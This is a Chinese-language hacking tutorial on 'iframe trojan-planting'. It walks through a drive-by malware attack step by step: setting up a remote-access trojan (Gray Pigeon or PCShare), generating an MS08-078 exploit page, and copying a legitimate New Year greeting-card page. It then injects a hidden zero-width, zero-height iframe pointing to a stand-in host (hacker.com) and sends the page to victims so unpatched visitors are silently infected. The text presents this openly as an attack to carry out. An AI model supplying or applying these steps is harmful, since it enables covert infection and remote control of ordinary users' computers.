IFRAME框架挂马实战

    每当年景不景气时，黑客病毒等恶意攻击事件就会接连不断的出现，“黑色星期五”病毒就是最好的证明，据说该病毒的制造者就是因为老板辞退而编写了这样一个贻害人间的病毒。2008年的金融危机有让一大批计算机工程师将无聊都发泄在了制造病毒上，特别是2008年底，圣诞老人送给黑客们的MS08-078漏洞，就是一个非常好的挂马利用方法，下面我们就为大家演示一下如何利用软件漏洞，配合IFRAME标记，进行隐藏的框架挂马。下面我们做过做个演示，比如我们将保存在电脑中的Google网页中插入如下代码：

    <iframe src=http://blog.sina.com.cn/deyumiao width=400 height=300></iframe>

    第一步：首先准备一款得心应手的木马，黑客通常会首选灰鸽子和PCShare，这两款软件在设置上都非常简单，易于操作上手。设置好相关服务，最后声称木马所用的服务控制端。

    第二步：使用FTP将木马上传到自己的网站空间中，并用记事本记录下木马的网络路径。然后在用MS08-078网页木马生成器，生成一个带有MS08-078漏洞的恶意网页。

    第三步：找一个正常的新年贺卡网页，将该网页保存到自己指定的目录中，然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改，然后上传到自己的网站空间中，看图片等内容是否能够正常显示。

    第四步：然后再一次打开修改好的贺卡网页，使用IFRAME标记语句，将生成好的MS08-078网页嵌入到贺卡网页中，嵌入挂马代码如下：

    <iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>

    将这段代码插入到贺卡网页之中后，就完成了我们的网页挂马操作。这段代码让正常浏览贺卡网页的用户，在看到贺卡页面之后，也随之运行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出页面，但是由于它的长和宽都为“0”，观看贺卡网站的用户不会看到溢出页面，因此非常隐蔽。此时我们的网页挂马页面就完成了，只需要将这个页面发送给其他人，那些没有修补MS08-078漏洞的用户，就会在不知不觉中，中黑客设定的木马。